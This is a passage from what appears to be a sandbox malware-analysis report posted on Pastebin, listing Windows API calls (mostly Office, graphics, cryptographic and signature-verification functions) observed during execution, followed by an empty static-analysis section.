  2403.     "gdi32.dll.CreateCompatibleBitmap",
  2404.     "gdi32.dll.SaveDC",
  2405.     "gdi32.dll.SetPixel",
  2406.     "gdi32.dll.GetPixel",
  2407.     "gdi32.dll.RestoreDC",
  2408.     "imm32.dll.ImmAssociateContext",
  2409.     "mso.dll.#806",
  2410.     "mso.dll.#4908",
  2411.     "mso.dll.#8439",
  2412.     "mso.dll.#2736",
  2413.     "gdi32.dll.GetTextAlign",
  2414.     "gdi32.dll.ExtTextOutW",
  2415.     "mso.dll.#8122",
  2416.     "mso.dll.#2114",
  2417.     "mso.dll.#6558",
  2418.     "gdi32.dll.GetFontData",
  2419.     "usp10.dll.ScriptItemizeOpenType",
  2420.     "usp10.dll.ScriptLayout",
  2421.     "usp10.dll.ScriptShapeOpenType",
  2422.     "usp10.dll.ScriptPlaceOpenType",
  2423.     "mso.dll.#1318",
  2424.     "gdi32.dll.GetTextExtentExPointWPri",
  2425.     "webservices.dll.WsResetHeap",
  2426.     "webservices.dll.WsCloseServiceProxy",
  2427.     "ws2_32.dll.#3",
  2428.     "webservices.dll.WsFreeServiceProxy",
  2429.     "ncrypt.dll.SslDecrementProviderReferenceCount",
  2430.     "ncrypt.dll.SslFreeObject",
  2431.     "mso.dll.#8395",
  2432.     "mso.dll.#379",
  2433.     "mso.dll.#6338",
  2434.     "mso.dll.#7964",
  2435.     "mso.dll.#1437",
  2436.     "mso.dll.#1427",
  2437.     "mso.dll.#6137",
  2438.     "winmm.dll.timeGetTime",
  2439.     "mso.dll.#7578",
  2440.     "mso.dll.#8483",
  2441.     "mso.dll.#3055",
  2442.     "user32.dll.GetForegroundWindow",
  2443.     "user32.dll.GetFocus",
  2444.     "user32.dll.GetClassNameA",
  2445.     "user32.dll.IsWindowRedirectedForPrint",
  2446.     "gdi32.dll.CreateRectRgnIndirect",
  2447.     "user32.dll.GetUpdateRgn",
  2448.     "gdi32.dll.GetRgnBox",
  2449.     "user32.dll.ValidateRect",
  2450.     "user32.dll.GetUpdateRect",
  2451.     "user32.dll.BeginPaint",
  2452.     "user32.dll.EndPaint",
  2453.     "mso.dll.#3624",
  2454.     "msptls.dll.?LsPointXYFromPointUV@Ptls6@@YGJPBUtagLSPOINT@1@KPBUtagLSPOINTUV@1@PAU21@@Z",
  2455.     "msptls.dll.?LsDisplayLine@Ptls6@@YGJPAVCLsLine@1@PBUtagLSPOINT@1@IPBUtagLSRECT@1@@Z",
  2456.     "gdi32.dll.TranslateCharsetInfo",
  2457.     "mso.dll.#3300",
  2458.     "mso.dll.#7465",
  2459.     "mso.dll.#6247",
  2460.     "mso.dll.#5070",
  2461.     "gdiplus.dll.GdipCreateSolidFill",
  2462.     "gdiplus.dll.GdipCreatePen1",
  2463.     "gdiplus.dll.GdipSetPenLineCap197819",
  2464.     "gdiplus.dll.GdipSetPenLineJoin",
  2465.     "gdiplus.dll.GdipSetPenMiterLimit",
  2466.     "gdiplus.dll.GdipCreateFromHDC",
  2467.     "gdiplus.dll.GdipSetPixelOffsetMode",
  2468.     "gdiplus.dll.GdipSetSmoothingMode",
  2469.     "gdiplus.dll.GdipSetCompositingQuality",
  2470.     "gdiplus.dll.GdipSetPageUnit",
  2471.     "gdiplus.dll.GdipSetInterpolationMode",
  2472.     "gdiplus.dll.GdipGetSmoothingMode",
  2473.     "gdiplus.dll.GdipFillPath",
  2474.     "gdiplus.dll.GdipDeleteGraphics",
  2475.     "gdiplus.dll.GdipDrawPath",
  2476.     "mso.dll.#6899",
  2477.     "gdi32.dll.GetClipRgn",
  2478.     "gdi32.dll.SelectClipRgn",
  2479.     "gdi32.dll.SetWindowOrgEx",
  2480.     "mso.dll.#732",
  2481.     "mso.dll.#5804",
  2482.     "mso.dll.#9465",
  2483.     "ole32.dll.CoCreateInstance",
  2484.     "user32.dll.ScreenToClient",
  2485.     "mso.dll.#434",
  2486.     "user32.dll.GetMessageExtraInfo",
  2487.     "user32.dll.GetCursorInfo",
  2488.     "user32.dll.GetCapture",
  2489.     "user32.dll.TrackMouseEvent",
  2490.     "user32.dll.GetInputState",
  2491.     "mso.dll.#8461",
  2492.     "user32.dll.GetClipboardOwner",
  2493.     "mso.dll.#1422",
  2494.     "user32.dll.MsgWaitForMultipleObjectsEx",
  2495.     "advapi32.dll.NotifyServiceStatusChangeW",
  2496.     "user32.dll.GetWindowDC",
  2497.     "gdi32.dll.SetLayout",
  2498.     "gdi32.dll.RectVisible",
  2499.     "gdi32.dll.ExcludeClipRect",
  2500.     "user32.dll.GetDesktopWindow",
  2501.     "user32.dll.WindowFromPoint",
  2502.     "user32.dll.FindWindowExW",
  2503.     "user32.dll.IsClipboardFormatAvailable",
  2504.     "user32.dll.GetMessagePos",
  2505.     "user32.dll.SetFocus",
  2506.     "mso.dll.#4746",
  2507.     "mso.dll.#424",
  2508.     "msptls.dll.?LsPointUV2FromPointUV1@Ptls6@@YGJKPBUtagLSPOINTUV@1@0KPAU21@@Z",
  2509.     "msptls.dll.?LsQueryLinePointPcp@Ptls6@@YGJPAVCLsLine@1@PBUtagLSPOINTUV@1@JPAUlsqsubinfo@1@PAJPAUlstextcell@1@@Z",
  2510.     "user32.dll.IsWindow",
  2511.     "user32.dll.GetActiveWindow",
  2512.     "user32.dll.GetAncestor",
  2513.     "mso.dll.#3544",
  2514.     "mso.dll.#900",
  2515.     "advapi32.dll.ConvertSidToStringSidW",
  2516.     "msi.dll.DllGetVersion",
  2517.     "msi.dll.#111",
  2518.     "user32.dll.GetScrollPos",
  2519.     "mso.dll.#629",
  2520.     "advapi32.dll.CryptAcquireContextA",
  2521.     "advapi32.dll.CryptGenKey",
  2522.     "cryptsp.dll.CryptGenKey",
  2523.     "advapi32.dll.CryptImportKey",
  2524.     "cryptsp.dll.CryptImportKey",
  2525.     "advapi32.dll.CryptExportKey",
  2526.     "cryptsp.dll.CryptExportKey",
  2527.     "advapi32.dll.CryptDestroyKey",
  2528.     "advapi32.dll.CryptCreateHash",
  2529.     "advapi32.dll.CryptSetHashParam",
  2530.     "advapi32.dll.CryptHashData",
  2531.     "advapi32.dll.CryptGetHashParam",
  2532.     "cryptsp.dll.CryptGetHashParam",
  2533.     "advapi32.dll.CryptDestroyHash",
  2534.     "kernel32.dll.FlsAlloc",
  2535.     "kernel32.dll.FlsGetValue",
  2536.     "kernel32.dll.FlsSetValue",
  2537.     "kernel32.dll.FlsFree",
  2538.     "ieawsdc.dll.HrExtractTemplateToPath",
  2539.     "msi.dll.#90",
  2540.     "crypt32.dll.CryptQueryObject",
  2541.     "wintrust.dll.CryptSIPPutSignedDataMsg",
  2542.     "wintrust.dll.CryptSIPGetSignedDataMsg",
  2543.     "cryptsp.dll.CryptGetDefaultProviderW",
  2544.     "cryptsp.dll.CryptAcquireContextW",
  2545.     "crypt32.dll.CertEnumCertificatesInStore",
  2546.     "crypt32.dll.CryptVerifyCertificateSignatureEx",
  2547.     "cryptsp.dll.CryptReleaseContext",
  2548.     "wintrust.dll.WinVerifyTrust",
  2549.     "wintrust.dll.WintrustCertificateTrust",
  2550.     "wintrust.dll.SoftpubAuthenticode",
  2551.     "wintrust.dll.SoftpubInitialize",
  2552.     "wintrust.dll.SoftpubLoadMessage",
  2553.     "wintrust.dll.SoftpubLoadSignature",
  2554.     "wintrust.dll.SoftpubCheckCert",
  2555.     "wintrust.dll.SoftpubCleanup",
  2556.     "wintrust.dll.CryptSIPVerifyIndirectData"
  2557. ]
  2558.  
  2559. [*] Static Analysis: {}
RAW Paste Data
We use cookies for various purposes including analytics. By continuing to use Pastebin, you agree to our use of cookies as described in the Cookies Policy. OK, I Understand
 
Top